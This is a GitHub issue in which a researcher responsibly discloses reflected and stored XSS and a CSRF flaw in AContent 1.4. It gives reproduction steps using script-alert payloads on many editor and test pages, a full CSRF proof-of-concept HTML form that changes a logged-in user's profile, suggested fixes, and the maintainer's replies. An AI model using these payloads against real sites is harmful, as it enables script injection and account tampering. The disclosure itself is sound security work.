Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XSS and CSRF issues on v1.4 #29

Open
metamorfosec opened this issue Aug 27, 2018 · 4 comments
Open

XSS and CSRF issues on v1.4 #29

metamorfosec opened this issue Aug 27, 2018 · 4 comments

Comments

@metamorfosec
Copy link

Hello...
I have found XSS and CSRF issues in atutor/AContent v1.4.
I used AContent 1.4 Demo on your official website.
Please let me know if you need additional information.
I hope this is a right channel to disclose security issues because you requested to post any bugs to this GitHub Page.
Regards.

Findings

XSS (Reflected)

https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>

XSS (Stored)

1 (editor/edit_content_folder.php)

  1. In the Content Folder Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

2 (editor/edit_content.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script> and then press Enter or click Save Button
  2. Please click Delete Content Icon to trigger the JS alert

3 (editor/edit_content.php)

  1. In the Title Field with HTML format selected, please enter any clickable name. For example, <script>test</script>.
  2. In the Body, please enter <script>alert(document.domain)</script>
  3. Click Preview Button to trigger the JS alert
  4. Click Save Button
  5. Click <script>test</script> to trigger the JS alert again

4 (tests/edit_test.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert

5 (tests/edit_question_likert.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button
  4. Every time when we on Question Bank (tests/question_db.php), JS alert also triggered

6 (tests/create_question_matchingdd.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

7 (tests/create_question_matching.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

8 (tests/create_question_multianswer.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

9 (tests/create_question_multichoice.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

10 (tests/create_question_long.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

11 (tests/edit_question_ordering.php)

  1. In the Question Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button
  3. We can trigger the JS alert by clicking Preview Button

12 (tests/edit_question_truefalse.php)

  1. In the Statement Field, please enter <script>alert(document.domain)</script>
  2. Click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Preview or Delete Button

13 (tests/question_cats_manage.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert
  3. We can also trigger the JS alert by clicking Delete Button

14 (course/course_property.php)

  1. In the Title Field, please enter <script>alert(document.domain)</script>
  2. Press Enter or click Save Button to trigger the JS alert

CSRF

  1. Login at official website.
  2. Save HTML code below and give it a name, e.g. CSRF_Payload.html.
  3. Open and execute the payload on the same browser by clicking the CLICK ME Button
<html>
	<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
		<input name="password_error" type="hidden">
		<input type="hidden" name="form_password_hidden" value="">
		<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
		<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
		<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
		<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
		<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
		<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
		<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
		<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
		<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
		<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
		<!-- Click the button to execute this CSRF Payload -->
		<input type="submit" name="submit" value="CLICK ME" class="submit">
	</form>
</html>

Suggested Mitigations

  1. For XSS issues, we can use input validation and escape function for all user supplied inputs. I see you made special characters become like &lt;script&gt;alert(document.domain)&lt;/script&gt; on certain places, but no on many other places and therefore still vulnerable to XSS.
  2. For CSRF issue, we can use CSRF Token. It would be better if Change Password and Change Email Address also use CSRF Token.
@gregrgay
Copy link
Collaborator

This application is no longer being maintained, though we will accept pull requests to address these issues.

@metamorfosec
Copy link
Author

Hi, thank you for your response.
I have forked your work to help address these issues.
I will make a pull request later.
Regards.

@gregrgay
Copy link
Collaborator

gregrgay commented Sep 7, 2018

Will watch for your pull requests. Thx

@metamorfosec metamorfosec mentioned this issue Sep 19, 2018
Open
@metamorfosec
Copy link
Author

Hello..,
I have just made a pull request.
I have added a new folder called protection contains third party class or library to prevent XSS and CSRF.
By the way, I cannot access edit test and question features because TR_ERROR_NO_ITEM_FOUND, so that I cannot reproduce number 4, 5, 11, and 12 for Stored XSS above. Anyway, I have updated the files related them like at create question feature.
Some warning messages may be still appear and I still looking for the root cause.
Regards.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@gregrgay @metamorfosec